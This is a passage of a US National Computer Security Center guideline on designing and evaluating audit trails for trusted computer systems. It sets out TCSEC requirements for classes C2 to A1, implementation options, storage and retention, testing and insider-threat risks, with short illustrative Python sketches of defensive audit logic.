7. POSSIBLE IMPLEMENTATION METHODS ..........................  17

    7.1 PRE/POST SELECTION OF AUDITABLE EVENTS ..............  17 

         7.1.1 Pre-Selection ................................  17
         7.1.2 Post-Selection ...............................  18

    7.2 DATA COMPRESSION ....................................  18
    7.3 MULTIPLE AUDIT TRAILS ...............................  19
    7.4 PHYSICAL STORAGE ....................................  19
    7.5 WRITE-ONCE DEVICE ...................................  20
    7.6 FORWARDING AUDIT DATA ...............................  21

8. OTHER TOPICS .............................................  22

    8.1 AUDIT DATA REDUCTION ................................  22
    8.2 AVAILABILITY OF AUDIT DATA ..........................  22
    8.3 AUDIT DATA RETENTION ................................  22
    8.4 TESTING .............................................  23
    8.5 DOCUMENTATION .......................................  23
    8.6 UNAVOIDABLE SECURITY RISKS ..........................  24

         8.6.1 Auditing Administrators/Insider Threat .......  24 
         8.6.2 Data Loss ....................................  25

9. AUDIT SUMMARY ...........................................  26 

GLOSSARY

REFERENCES ..............................................  27 

                          PREFACE                

Throughout this guideline there will be recommendations made that
are not included in the Trusted Computer System Evaluation 
Criteria (the Criteria) as requirements.  Any recommendations 
that are not in the Criteria will be prefaced by the word 
"should," whereas all requirements will be prefaced by the word 
"shall."  It is hoped that this will help to avoid any confusion.

                                   v 

1.   INTRODUCTION 

1.1   History of the National Computer Security Center 

The DoD Computer Security Center (DoDCSC) was established in 
January 1981 for the purpose of expanding on the work started by 
the DoD Security Initiative.  Accordingly, the Director, National
Computer Security Center, has the responsibility for establishing
and publishing standards and guidelines for all areas of computer
security.  In 1985, DoDCSC's name was changed to the National 
Computer Security Center to reflect its responsibility for 
computer security throughout the federal government. 

1.2   Goal of the National Computer Security Center 

The main goal of the National Computer Security Center is to 
encourage the widespread availability of trusted computer 
systems.  In support of that goal a metric was created, the DoD 
Trusted Computer System Evaluation Criteria (the Criteria), 
against which computer systems could be evaluated for security.  
The Criteria was originally published on 15 August 1983 as CSC- 
STD-001-83.  In December 1985 the DoD adopted it, with a few 
changes, as a DoD Standard, DoD 5200.28-STD.  DoD Directive 
5200.28, "Security Requirements for Automatic Data Processing 
(ADP) Systems" has been written to, among other things, require 
the Department of Defense Trusted Computer System Evaluation 
Criteria to be used throughout the DoD.  The Criteria is the 
standard used for evaluating the effectiveness of security 
controls built into ADP systems.  The Criteria is divided into 
four divisions: D, C, B, and A, ordered in a hierarchical manner 
with the highest division (A) being reserved for systems 
providing the best available level of assurance.  Within 
divisions C and B there are a number of subdivisions known as 
classes, which are also ordered in a hierarchical manner to 
represent different levels of security in these classes.   

2.   PURPOSE 

For Criteria classes C2 through A1 the Criteria requires that a 
user's actions be open to scrutiny by means of an audit.  The 
audit process of a secure system is the process of recording, 
examining, and reviewing any or all security-relevant activities 
on the system.  This guideline is intended to discuss issues 
involved in implementing and evaluating an audit mechanism.  The 
purpose of this document is twofold.  It provides guidance to 
manufacturers on how to design and incorporate an effective audit
mechanism into their system, and it provides guidance to 
implementors on how to make effective use of the audit 
                                1

capabilities provided by trusted systems.  This document contains
suggestions as to what information should be recorded on the 
audit trail, how the audit should be conducted, and what 
protective measures should be accorded to the audit resources. 

Any examples in this document are not to be construed as the only
implementations that will satisfy the Criteria requirement.  The 
examples are merely suggestions of appropriate implementations.  
The recommendations in this document are also not to be construed
as supplementary requirements to the Criteria. The Criteria is 
the only metric against which systems are to be evaluated.   

This guideline is part of an on-going program to provide helpful 
guidance on Criteria issues and the features they address. 

3.   SCOPE 

An important security feature of Criteria classes C2 through A1 
is the ability of the ADP system to audit any or all of the 
activities on the system.  This guideline will discuss auditing 
and the features of audit facilities as they apply to computer 
systems and products that are being built with the intention of 
meeting the requirements of the Criteria. 

                                2 

4.  CONTROL OBJECTIVES

The Trusted Computer System Evaluation Criteria gives the 
following as the Accountability Control Objective: 

    "Systems that are used to process or handle classified or 
     other sensitive information must assure individual          
     accountability whenever either a mandatory or               
     discretionary security policy is invoked.  Furthermore, to  
     assure accountability the capability must exist for an 
     authorized and competent agent to access and evaluate       
     accountability information by a secure means, within a      
     reasonable amount of time and without undue difficulty."(1) 

The Accountability Control Objective as it relates to auditing 
leads to the following control objective for auditing: 

    "A trusted computer system must provide authorized personnel 
     with the ability to audit any action that can potentially  
     cause access to, generation of, or effect the release 
     of classified or sensitive information.  The audit 
     data will be selectively acquired based on the auditing 
     needs of a particular installation and/or application.      
     However, there must be sufficient granularity in the audit  
     data to support tracing the auditable events to a specific  
     individual (or process) who has taken the actions or on     
     whose behalf the actions were taken."(1)   

                                3 

5.   OVERVIEW OF AUDITING PRINCIPLES 

Audit trails are used to detect and deter penetration of a
computer system and to reveal usage that identifies misuse.  At
the discretion of the auditor, audit trails may be limited to
specific events or may encompass all of the activities on a
system.  Although not required by the TCSEC, it should be
possible for the target of the audit mechanism to be either a
subject or an object.  That is to say, the audit mechanism should
be capable of monitoring every time John accessed the system as
well as every time the nuclear reactor file was accessed; and
likewise every time John accessed the nuclear reactor file. 

5.1   Purpose of the Audit Mechanism 

The audit mechanism of a computer system has five important
security goals.  First, the audit mechanism must "allow the
review of patterns of access to individual objects, access
histories of specific processes and individuals, and the use of
the various protection mechanisms supported by the system and
their effectiveness."(2)  Second, the audit mechanism must allow
discovery of both users' and outsiders' repeated attempts to
bypass the protection mechanisms.  Third, the audit mechanism
must allow discovery of any use of privileges that may occur when
a user assumes a functionality with privileges greater than his
or her own, e.g., programmer to administrator.  In this case
there may be no bypass of security controls but nevertheless a
violation is made possible.  Fourth, the audit mechanism must act
as a deterrent against perpetrators' habitual attempts to bypass
the system protection mechanisms.  However, to act as a
deterrent, the perpetrator must be aware of the audit mechanism's
existence and its active use to detect any attempts to bypass
system protection mechanisms.  The fifth goal of the audit
mechanism is to supply "an additional form of user assurance that
attempts to bypass the protection mechanisms are recorded and
discovered."(2)  Even if the attempt to bypass the protection
mechanism is successful, the audit trail will still provide
assurance by its ability to aid in assessing the damage done by
the violation, thus improving the system's ability to control the
damage. 

5.2.  Users of the Audit Mechanism 

"The users of the audit mechanism can be divided into two groups. 
The first group consists of the auditor, who is an individual
with administrative duties, who selects the events to be audited
on the system, sets up the audit flags which enable the recording

                                4

of those events, and analyzes the trail of audit events."(2)  In
some systems the duties of the auditor may be encompassed in the
duties of the system security administrator.  Also, at the lower
classes, the auditor role may be performed by the system
administrator.  This document will refer to the person
responsible for auditing as the system security administrator,
although it is understood that the auditing guidelines may apply
to system administrators and/or system security administrators
and/or a separate auditor in some ADP systems.   

"The second group of users of the audit mechanism consists of the
system users themselves; this group includes the administrators,
the operators, the system programmers, and all other users.  They
are considered users of the audit mechanism not only because
they, and their programs, generate audit events,"(2) but because
they must understand that the audit mechanism exists and what
impact it has on them.  This is important because otherwise the
user deterrence and user assurance goals of the audit mechanism
cannot be achieved.    

5.3  Aspects of Effective Auditing 

5.3.1.  Identification/Authentication 

 Logging in on a system normally requires that a user enter the 
specified form of identification (e.g., login ID, magnetic strip) 
and a password (or some other mechanism) for authentication. 
Whether this information is valid or invalid, the execution of
the login procedure is an auditable event and the identification
entered may be considered to be auditable information.  It is
recommended that authentication information, such as passwords,
not be forwarded to the audit trail.  In the event that the
identification entered is not recognized as being valid, the
system should also omit this information from the audit trail. 
The reason for this is that a user may have entered a password
when the system expected a login ID.  If the information had been
written to the audit trail, it would compromise the password and
the security of the user. 
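The recommendation above — audit the login attempt itself, never record the authentication data, and suppress unrecognized identifiers — can be sketched as follows.  This is an illustrative sketch only; the user database, field names, and placeholder string are assumptions, not part of any particular TCB.

```python
import datetime

KNOWN_USERS = {"jsmith", "jdoe"}   # illustrative user database

def audit_login(login_id, password, success, trail):
    """Record a login attempt without ever writing authentication data."""
    # Omit the identifier when it is not a recognized login ID: the
    # "ID" may actually be a password typed into the wrong field.
    recorded_id = login_id if login_id in KNOWN_USERS else "<unrecognized>"
    trail.append({
        "time": datetime.datetime.now(datetime.timezone.utc).isoformat(),
        "event": "login",
        "user": recorded_id,
        "success": success,
        # The password is deliberately never stored on the trail.
    })

trail = []
audit_login("jsmith", "s3cret", True, trail)
audit_login("s3cret", "", False, trail)   # password typed in the ID field
```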

There are, however, environments where the risk involved in 
recording invalid identification information is reduced.  In
systems that support formatted terminals, the likelihood of
password entry in the identification field is markedly reduced,
hence the recording of identification information would pose no
major threat.  The benefit of recording the identification
information is that break-in attempts would be easier to detect
and the perpetrator easier to identify.  The 

                                 5

information gathered here may be necessary for any legal 
prosecution that may follow a security  violation.    

5.3.2  Administrative 

All systems rated at class C2 or higher shall have audit 
capabilities and personnel designated as responsible for the
audit procedures.  For the C2 and B1 classes, the duties of the
system operators could encompass all functions including those of
the auditor.  Starting at the B2 class, there is a requirement
for the TCB to support separate operator and administrator
functions.  In addition, at the B3 class and above, there is a
requirement to identify the system security administrator
functions.  When one assumes the system security administrator
role on the system, it shall be after taking distinct auditable
action, e.g., login procedure.  When one with the privilege of
assuming the role is on the system, the act of assuming that role
shall also be an auditable event. 

5.3.3   System Design 

The system design should include a mechanism to invoke the audit 
function at the request of the system security administrator.  A 
mechanism should also be included to determine if the event is to
be selected for inclusion as an audit trail entry.  If
pre-selection of events is not implemented, then all auditable
events should be forwarded to the audit trail.  The Criteria
requirement that the administrator be able to select events
based on user identity and/or object security classification must
still be satisfied.  This requirement can be met by
allowing post-selection of events through the use of queries. 
Whatever reduction tool is used to analyze the audit trail shall
be provided by the vendor.  

5.4   Security of the Audit 

Audit trail software, as well as the audit trail itself, should
be protected by the Trusted Computing Base and should be subject
to strict access controls.  The security requirements of the
audit mechanism are the following: 

(1)  The event recording mechanism shall be part of the TCB and  
     shall be protected from unauthorized modification or        
     circumvention. 

(2)  The audit trail itself shall be protected by the TCB from   

                                 6

     unauthorized access (i.e., only the audit personnel may     
     access the audit trail).  The audit trail shall also be     
     protected from unauthorized modification.  

(3)  The audit-event enabling/disabling mechanism shall be part  
     of the TCB and shall remain inaccessible to the unauthorized 
     users.(2)  

At a minimum, the data on the audit trail should be considered to
be sensitive, and the audit trail itself shall be considered to
be as sensitive as the most sensitive data contained in the
system. 

When the medium containing the audit trail is physically removed 
from the ADP system, the medium should be accorded the physical 
protection required for the highest sensitivity level of data 
contained in the system. 

                                 7 

6.   MEETING THE CRITERIA REQUIREMENTS 

This section of the guideline will discuss the audit requirements
in the Criteria and will present a number of additional 
recommendations.  There are four levels of audit requirements. 
The first level is at the C2 Criteria class and the requirements 
continue evolving through the B3 Criteria class.   At each of
these levels, the guideline will list some of the events which
should be auditable, what information should be on the audit
trail, and on what basis events may be selected to be audited. 
All of the requirements will be prefaced by the word "shall," and
any additional recommendations will be prefaced by the word
"should." 

6.1   The C2 Audit Requirement 

6.1.1   Auditable Events 

The following events shall be subject to audit at the C2 class:  

   * Use of identification and authentication mechanisms 

   * Introduction of objects into a user's address space  

   * Deletion of objects from a user's address space 

   * Actions taken by computer operators and system              
     administrators and/or system security administrators    

   * All security-relevant events (as defined in Section 5 of    
     this guideline) 

   * Production of printed output 

6.1.2   Auditable Information 

The following information shall be recorded on the audit trail at
the C2 class:  

   * Date and time of the event 

   * The unique identifier on whose behalf the subject generating 
     the event was operating 

   * Type of event 

   * Success or failure of the event 

                                8

   * Origin of the request (e.g., terminal ID) for               
     identification/authentication events 

   * Name of object introduced, accessed, or deleted from a      
     user's address space 

   * Description of modifications made by the system             
     administrator to the user/system security databases   
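A minimal record carrying the fields listed above might look like the sketch below.  The field names and sample values are illustrative assumptions; real TCB record formats are system dependent.

```python
from dataclasses import dataclass, asdict

@dataclass
class AuditRecord:
    """One audit-trail entry with the C2-required information."""
    date_time: str        # date and time of the event
    user_id: str          # unique identifier on whose behalf the subject acted
    event_type: str       # type of event
    success: bool         # success or failure of the event
    origin: str = ""      # request origin (e.g., terminal ID) for I&A events
    object_name: str = "" # object introduced, accessed, or deleted
    description: str = "" # e.g., administrator changes to security databases

rec = AuditRecord("1987-06-01T09:30:00Z", "jsmith", "file_open", True,
                  object_name="/payroll/data")
```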

6.1.3   Audit Basis 

At the C2 level, the ADP System Administrator shall be able to
audit based on individual identity. 

The ADP System Administrator should also be able to audit based
on object identity. 

6.2   The B1 Audit Requirement 

6.2.1   Auditable Events 

The Criteria specifically adds the following to the list of
events that shall be auditable at the B1 class: 

   * Any override of human readable output markings (including   
     overwrite of sensitivity label markings and the turning off 
     of labelling capabilities) on paged, hard-copy output       
     devices 

   * Change of designation (single-level to/from multi-level) of 
     any communication channel or I/O device 

   * Change of sensitivity level(s) associated with a            
     single-level communication channel or I/O device 

   * Change of range designation of any multi-level communication 
     channel or I/O device  

6.2.2   Auditable Information 

The Criteria specifically adds the following to the list of 
information that shall be recorded on the audit trail at the B1  
class: 

   * Security level of the object 

                                 9 

The following information should also be recorded on the audit
trail at the B1 class: 

   * Subject sensitivity level  

6.2.3   Audit Basis 

In addition to previous selection criteria, at the B1 level the 
Criteria specifically requires that the ADP System Administrator 
shall be able to audit based on individual identity and/or object
security level. 

6.3   The B2 Audit Requirement 

6.3.1   Auditable Events 

The Criteria specifically adds the following to the list of
events that shall be auditable at the B2 class: 

   * Events that may exercise covert storage channels  

6.3.2   Auditable Information 

No new requirements have been added at the B2 class. 

6.3.3   Audit Basis 

In addition to previous selection criteria, at the B2 level the 
Criteria specifically requires that "the TCB shall be able to
audit the identified events that may be used in the exploitation
of covert storage channels."  The Trusted Computing Base shall
audit covert storage channels that exceed ten bits per second.(1) 

The Trusted Computing Base should also provide the capability to 
audit the use of covert storage mechanisms with bandwidths that
may exceed a rate of one bit in ten seconds.  

6.4   The B3 Audit Requirement 

6.4.1   Auditable Events 

The Criteria specifically adds the following to the list of
events that shall be auditable at the B3 class: 

   * Events that may indicate an imminent violation of the 

                                10

     system's security policy (e.g., exercise covert timing      
     channels) 

6.4.2   Auditable Information 

No new requirements have been added at the B3 class. 

6.4.3   Audit Basis 

In addition to previous selection criteria, at the B3 level the  
Criteria specifically requires that "the TCB shall contain a 
mechanism that is able to monitor the occurrence or accumulation
of security auditable events that may indicate an imminent
violation of security policy.  This mechanism shall be able to
immediately notify the system security administrator when
thresholds are exceeded and, if the occurrence or accumulation of
these security-relevant events continues, the system shall take
the least disruptive action to terminate the event."(1)     

Events that would indicate an imminent security violation would 
include events that utilize covert timing channels that may
exceed a rate of ten bits per second and any repeated
unsuccessful login attempts.   

Being able to immediately notify the system security
administrator when thresholds are exceeded means that the
mechanism shall be able to recognize, report, and respond to a
violation of the security policy more rapidly than required at
lower levels of the Criteria, which usually only requires the
System Security Administrator to review an audit trail at some
time after the event.  Notification of the violation "should be
at the same priority as any other TCB message to an operator."(5) 

"If the occurrence or accumulation of these security-relevant
events continues, the system shall take the least disruptive
action to terminate the event."(1)  These actions may include
locking the terminal of the user who is causing the event or
terminating the suspect's process(es).  In general, the least
disruptive action is application dependent and there is no
requirement to demonstrate that the action is the least
disruptive of all possible actions.  Any action which terminates
the event is acceptable, but halting the system should be the
last resort.   
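The threshold mechanism described above — immediate notification when a threshold is exceeded, then a least disruptive terminating action if the events continue — might be sketched as follows.  The threshold value and the chosen action (locking the user's terminal) are illustrative assumptions.

```python
class ThresholdMonitor:
    """Counts security-relevant events and escalates at a threshold."""
    def __init__(self, threshold, notify, terminate):
        self.threshold = threshold
        self.notify = notify        # immediate alert to the administrator
        self.terminate = terminate  # least disruptive terminating action
        self.counts = {}

    def record(self, user, event):
        n = self.counts.get((user, event), 0) + 1
        self.counts[(user, event)] = n
        if n == self.threshold:
            self.notify(f"threshold reached: {user} {event} x{n}")
        elif n > self.threshold:
            # Occurrence continues: take the least disruptive action,
            # e.g., lock the offending user's terminal.
            self.terminate(user)

alerts, locked = [], []
mon = ThresholdMonitor(3, alerts.append, locked.append)
for _ in range(4):
    mon.record("jsmith", "failed_login")
```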

                                11

6.5   The A1 Audit Requirement 

6.5.1   Auditable Events 

No new requirements have been added at the A1 class. 

6.5.2   Auditable Information 

No new requirements have been added at the A1 class. 

6.5.3   Audit Basis 

No new requirements have been added at the A1 class. 

                                12 

7.   POSSIBLE IMPLEMENTATION METHODS 

The techniques for implementing the audit requirements will vary 
from system to system depending upon the characteristics of the 
software, firmware, and hardware involved and any optional
features that are to be available.  Technologically advanced
techniques that are available should be used to the best
advantage in the system design to provide the requisite security
as well as cost-effectiveness and performance.  

7.1   Pre/Post Selection of Auditable Events 

There is a requirement at classes C2 and above that all security-
relevant events be auditable.  However, these events may or may
not always be recorded on the audit trail.  Options that may be 
exercised in selecting which events should be audited include a
pre-selection feature and a post-selection feature.  A system may
choose to implement both options, a pre-selection option only, or
a post-selection option only.  

If a system developer chooses not to implement a general pre/post
selection option, there is still a requirement to allow the 
administrator to selectively audit the actions of specified users
for all Criteria classes.  Starting at the B1 class, the 
administrator shall also be able to audit based on object
security level. 

There should be options to allow selection by either individuals
or groups of users.  For example, the administrator may select
events related to a specified individual or select events related
to individuals included in a specified group.  Also, the
administrator may specify that events related to the audit file
be selected or, at classes B1 and above, that accesses to objects
with a given sensitivity level, such as Top Secret, be selected. 

7.1.1   Pre-Selection 

For each auditable event the TCB should contain a mechanism to 
indicate if the event is to be recorded on the audit trail.  The 
system security administrator or designee shall be the only
person authorized to select the events to be recorded. 
Pre-selection may be by user(s) identity, and at the B1 class and
above, pre-selection may also be possible by object security
level.  Although the system security administrator shall be
authorized to select which events are to be recorded, the system
security administrator should not be able to exclude himself from
being audited. 
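Pre-selection by user identity, with the constraint that the system security administrator cannot exclude himself from auditing, might be sketched as follows.  The role names and the flag set are illustrative assumptions.

```python
AUDITED_USERS = {"jsmith"}     # flags set by the security administrator
SECURITY_ADMIN = "secadmin"

def pre_selected(user):
    """The administrator is always audited; others only if selected."""
    return user == SECURITY_ADMIN or user in AUDITED_USERS

def maybe_audit(user, event, trail):
    if pre_selected(user):
        trail.append((user, event))

trail = []
maybe_audit("jsmith", "file_open", trail)
maybe_audit("jdoe", "file_open", trail)       # not selected: dropped
maybe_audit("secadmin", "enable_audit", trail)
```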

                                13

Although it would not be recommended, the system security  
administrator may have the capability to select that no events be
recorded regardless of the Criteria requirements.  The intention 
here is to provide flexibility.  The purpose of designing audit 
features into a system is not to impose the Criteria on users
that may not want it, but merely to provide the capability to
implement the requirements. 

A disadvantage of pre-selection is that it is very hard to
predict what events may be of security-relevant interest at a
future date.  There is always the possibility that events not
pre-selected could one day become security-relevant, and the
potential loss from not auditing these events would be impossible
to determine. 

The advantage of pre-selection could possibly be better
performance as a result of not auditing all the events on the
system. 

7.1.2   Post-Selection 

If the post-selection option to select only specified events from
an existing audit trail is implemented, again, only authorized 
personnel shall be able to make this selection.  Inclusion of
this option requires that the system should have trusted
facilities (as described in section 9.1) to accept
query/retrieval requests, to expand any compressed data, and to
output the requested data. 
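Post-selection amounts to running queries over a complete, already-recorded trail.  A sketch, with illustrative record fields:

```python
def query(trail, user=None, event_type=None):
    """Select records from a full audit trail after the fact."""
    return [r for r in trail
            if (user is None or r["user"] == user)
            and (event_type is None or r["event"] == event_type)]

trail = [
    {"user": "jsmith", "event": "login"},
    {"user": "jdoe",   "event": "file_open"},
    {"user": "jsmith", "event": "file_open"},
]
```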

The main advantage of post-selection is that information that may
prove useful in the future is already recorded on an audit trail
and may be queried at any time. 

The disadvantage involved in post-selection could possibly be 
degraded performance due to the writing and storing of what could
possibly be a very large audit trail. 

7.2   Data Compression 

"Since a system that selects all events to be audited may
generate a large amount of data, it may be necessary to encode
the data to conserve space and minimize the processor time
required" to record the audit records.(3)  If the audit trail is
encoded, a complementary mechanism must be included to decode the
data when required.  The decoding of the audit trail may be done
as a preprocess before the audit records are accessed by the
database or as a postprocess after a relevant record has been 

                                14

found.  Such decoding is necessary to present the data in an 
understandable form both at the administrator's terminal and on
batch reports.  The cost of compressing the audit trail would be
the time required for the compression and expansion processes. 
The benefit of compressing data is the savings in storage and the
savings in time to write the records to the audit trail.  
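The complementary encode/decode pair described above could be sketched as follows.  The use of zlib and JSON here is purely illustrative; the guideline does not prescribe any particular encoding.

```python
import json
import zlib

def encode_record(record):
    """Compress a record before writing it to the audit trail."""
    return zlib.compress(json.dumps(record).encode("utf-8"))

def decode_record(blob):
    """Complementary decoder, run before analysis or report generation."""
    return json.loads(zlib.decompress(blob).decode("utf-8"))

rec = {"user": "jsmith", "event": "file_open", "success": True}
blob = encode_record(rec)
```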

7.3   Multiple Audit Trails 

All events included on the audit trail may be written as part of
the same audit trail, but some systems may prefer to have several
distinct audit trails, e.g., one would be for "user" events, one
for "operator" events, and one for "system security
administrator" events.  This would result in several smaller
trails for subsequent analysis.  In some cases, however, it may
be necessary to combine the information from the trails when
questionable events occur in order to obtain a composite of the
sequence of events as they occurred.  In cases where there are
multiple audit trails, it is preferred that there be some
accurate, or at least synchronized, time stamps across the
multiple logs.    

Although the preference for several distinct audit trails may be 
present, it is important to note that it is often more useful
that the TCB be able to present all audit data as one
comprehensive audit trail. 
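Given synchronized time stamps, presenting several distinct trails as one comprehensive trail reduces to a merge by time.  A sketch, assuming each per-role trail is already sorted by timestamp:

```python
import heapq

def merge_trails(*trails):
    """Merge per-role audit trails (each sorted by timestamp) into one."""
    return list(heapq.merge(*trails, key=lambda r: r[0]))

user_trail     = [(1, "user", "login"), (4, "user", "file_open")]
operator_trail = [(2, "operator", "mount_tape")]
admin_trail    = [(3, "secadmin", "enable_audit")]
merged = merge_trails(user_trail, operator_trail, admin_trail)
```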

7.4   Physical Storage 

A factor to consider in the selection of the medium to be used
for the audit trail would be the expected usage of the system. 
The I/O volume for a system with few users executing few
applications would be quite different from that of a large system
with a multitude of users performing a variety of applications. 
In any case, however, the system should notify the system
operator or administrator when the audit trail medium is
approaching its storage capacity.  Adequate advance notification
to the operator is especially necessary if human intervention is
required.   

If the audit trail storage medium is saturated before it is 
replaced, the operating system shall detect this and take some 
appropriate action such as: 

1.  Notifying the operator that the medium is "full" and action  
    is necessary.  The system should then stop and require       
    rebooting.  Although a valid option, this action creates a   

                                15

    severe threat of denial-of-service attacks. 

2.  Storing the current audit records on a temporary medium with 
    the intention of later migration to the normal operational   
    medium, thus allowing auditing to continue.  This temporary  
    storage medium should be afforded the same protection as the 
    regular audit storage medium in order to prevent any attempts 
    to tamper with it. 

3.  Delaying input of new actions and/or slowing down current    
    operations to prevent any action that requires use of the    
    audit mechanism. 

4.  Stopping until the administrative personnel make more space  
    available for writing audit records.    

5.  Stopping auditing entirely as a result of a decision by the  
    system security administrator. 

Any action that is taken in response to storage overflow shall be 
audited.  One case that deserves mention, however, is when the
system security administrator's decisions are embedded in the
system logic.  Such pre-programmed choices may be triggered
automatically, and the resulting action may not be audited. 
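A sketch of the saturation logic, covering the advance warning, the diversion to protected temporary storage (action 2 above), and the requirement that the response itself be audited.  The capacity, warning threshold, and record shapes are illustrative assumptions.

```python
def write_record(record, primary, temporary, capacity, warn):
    """Write an audit record; warn near capacity, divert at saturation."""
    if len(primary) >= capacity:
        # Divert to protected temporary storage so auditing can
        # continue, and audit the diversion itself.
        temporary.append(("audit", "primary medium full: diverted"))
        temporary.append(record)
        return "diverted"
    primary.append(record)
    if len(primary) >= capacity * 0.9:
        warn("audit medium approaching capacity")
    return "ok"

primary, temporary, warnings = [], [], []
for i in range(11):
    write_record(("event", i), primary, temporary, 10, warnings.append)
```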

Still another consideration is the speed at which the medium 
operates.  It should be able to accommodate the "worst case" 
condition such as when there are a large number of users on the 
system and all auditable events are to be recorded.  This worst
case rate should be estimated during the system design phase and
(when possible) suitable hardware should be selected for this
purpose. 

Regardless of how the system handles audit trail overflow, there 
must be a way to archive all of the audit data.  

7.5   Write-Once Device 

For the lower Criteria classes (e.g., C2, B1) the audit trail may
be the major tool used in detecting security compromises. 
Implicit in this is that the audit resources should provide the
maximum protection possible.  One technique that may be employed
to protect the audit trail is to record it on a mechanism
designed to be a write-only device.  Another choice would be to
set the designated device to write-once mode by disabling the 

                                16

read mechanism.  This method could prevent an attacker from
erasing or modifying the data already written on the audit trail
because the attacker will not be able to go back and read or find
the data that he or she wishes to modify.   

If a hardware device is available that permits only the writing
of data on a medium, modification of data already recorded would
be quite difficult.  Spurious messages could be written, but to
locate and modify an already recorded message would be difficult. 
Use of a write-once device does not prevent a penetrator from
modifying audit resources in memory, including any buffers, in
the current audit trail. 

If a write-once device is used to record the audit trail, the
medium can later be switched to a compatible read device to allow 
authorized personnel to analyze the information on the audit
trail in order to detect any attempts to penetrate the system. 
If a penetrator modified the audit software to prevent writing
records on the audit trail, the absence of data during an
extended period of time would indicate a possible security
compromise.  The disadvantage of using a write-once device is
that it necessitates a delay before the audit trail is available
for analysis by the administrator.  This may be offset by
allowing the system security administrator to review the audit
trail in real-time by getting copies of all audit records on
their way to the device. 

7.6   Forwarding Audit Data 

If the facilities are available, another method of protecting the
audit trail would be to forward it to a dedicated processor.  The
audit trail should then be more readily available for analysis by
the system security administrator.  

                                17 

8.  OTHER TOPICS 

8.1   Audit Data Reduction 

Depending upon the amount of activity on a system and the audit 
selection process used, the audit trail size may vary.  It is a
safe assumption, though, that the audit trail would grow to sizes
that would necessitate some form of audit data reduction.  The
data reduction tool would most likely be a batch program that
would interface with the system security administrator.  This batch
run could be a combination of database query language and a
report generator with the input being a standardized audit file. 
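Such a reduction run — a query over a standardized audit file followed by report generation — might look like the sketch below.  The record fields and report format are illustrative assumptions.

```python
from collections import Counter

def reduce_report(trail, event_type):
    """Summarize occurrences of one event type per user, report-style."""
    counts = Counter(r["user"] for r in trail if r["event"] == event_type)
    return [f"{user}: {n}" for user, n in counts.most_common()]

trail = [
    {"user": "jsmith", "event": "failed_login"},
    {"user": "jsmith", "event": "failed_login"},
    {"user": "jdoe",   "event": "file_open"},
]
report = reduce_report(trail, "failed_login")
```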

Although they are not necessarily part of the TCB, the audit 
reduction tools should be maintained under the same configuration
control system as the remainder of the system. 

8.2  Availability of Audit Data 

In standard data processing, audit information is recorded as it 
occurs.  Although most information is not required to be
immediately available for real-time analysis, the system security
administrator should have the capability to retrieve audit
information within minutes of its recording.  The delay between
recording audit information and making it available for analysis
should be minimal, in the range of several minutes.   

For events which do require immediate attention, at the B3 class
and above, an alert shall be sent out to the system security 
administrator.  In systems that store the audit trail in a
buffer, the system security administrator should have the
capability to cause the buffer to be written out.  Regarding
real-time alarms, where they are sent is system dependent.   

8.3  Audit Data Retention 

The exact period of time required for retaining the audit trail  
is site dependent and should be documented in the site's
operating procedures manual.  When trying to arrive at the
optimum time for audit trail retention, any time restrictions on
the storage medium should be considered.  The storage medium used
must be able to reliably retain the audit data for the amount of
time required by the site.     

The audit trail should be reviewed at least once a week.  It is
very possible that once a week may be too long to wait to review 

                                18

the audit trail.  Depending on the amount of audit data expected 
by the system, this parameter should be adjusted accordingly. 
The recommended time in between audit trail reviews should be
documented in the Trusted Facility Manual.      

8.4  Testing 

The audit resources, along with all other resources protected by
the TCB, have increasing assurance requirements at each higher
Criteria class.  For the lower classes, an audit trail would be a
major factor in detecting penetration attempts.  Unfortunately,
at these lower classes, the audit resources are more susceptible
to penetration and corruption.  "The TCB must provide some
assurance that the data will still be there when the
administrator tries to use it."(3)  The testing requirement
recognizes the vulnerability of the audit trail, and starting
with the C2 class, shall include a search for obvious flaws that
would corrupt or destroy the audit trail.  If the audit trail is
corrupted or destroyed, the existence of such flaws indicates
that the system can be penetrated.  Testing should also be
performed to uncover any ways of circumventing the audit
mechanisms.  The "flaws found in testing may be neutralized in 
any of a number of ways.  One way available to the system
designer is to audit all uses of the mechanism in which the flaw
is found and to log such events."(3)  An attempt should be made
to remove the flaw.   

At class B2 and above, it is required that all detected flaws
shall be corrected or else a lower rating will be given.  If
during testing the audit trail appears valid, analysis of this
data can verify that it does or does not accurately reflect the
events that should be included on the audit trail.  Even though
system assurances may increase at the higher classes, the audit
trail is still an effective tool during the testing phase as well
as operationally in detecting actual or potential security
compromises. 

8.5  Documentation  

Starting at the C2 class, documentation concerning the audit 
requirements shall be contained in the Trusted Facility Manual.  
The Trusted Facility Manual shall explain the procedures to
record, examine, and maintain audit files.  It shall detail the
audit record structure for each type of audit event, and should
include what each field is and what the size of the field is. 

The Trusted Facility Manual shall also include a complete  

                                19

description of the audit mechanism interface, how it should be
used, its default settings, cautions about the trade-offs
involved in using various configurations and capabilities, and
how to set up and run the system such that the audit data is 
afforded appropriate protection. 

If audit events can be pre- or post-selected, the manual should
also describe the tools and mechanisms available and how they are
to be used. 

8.6  Unavoidable Security Risks 

There are certain risks contained in the audit process that exist
simply because there is no way to prevent these events from ever 
occurring.  Because there are certain unpredictable factors
involved in auditing, e.g., human error and natural events, the
audit mechanism may never be one hundred percent reliable. 
Preventive
measures may be taken to minimize the likelihood of any of these
factors adversely affecting the security provided by the audit
mechanism, but no audit mechanism will ever be risk free.      

8.6.1   Auditing Administrators/Insider Threat 

Even with auditing mechanisms in place to detect and deter
security violations, the threat of the perpetrator actually being
the system security administrator or someone involved with the
system security design will always be present.  It is quite
possible that the system security administrator of a secure
system could stop the auditing of activities while entering the
system and corrupting files for personal benefit.  These
authorized personnel, who may also have access to identification
and authentication information, could also choose to enter the
system disguised as another user in order to commit crimes under
a false identity.  

Management should be aware of this risk and should be certain to 
exercise discretion when selecting the system security 
administrator.  The person who is to be selected for a trusted 
position, such as the system security administrator, should be 
subject to a background check before being granted the privileges
that could one day be used against the employer.   

The system security administrator could also be watched to ensure
that there are no unexplained variances in normal duties.  Any 
deviation from the norm of operations may indicate that a
violation of security has occurred or is about to occur. 

                                20

An additional security measure to control this insider threat is
to ensure that the system administrator and the person
responsible for the audit are two different people.  "The
separation of the auditor's functions, databases, and access
privileges from those of the system administrator is an important
application of the separation of privilege and least privilege 
principles.  Should such a separation not be performed, and
should the administrator be allowed to undertake auditor
functions or vice-versa, the entire security function would
become the responsibility of a single, unaccountable
individual."(2) 

Another alternative may be to employ separate auditor roles. 
Such a situation may give one person the authority to turn off
the audit mechanism, while another person may have the authority
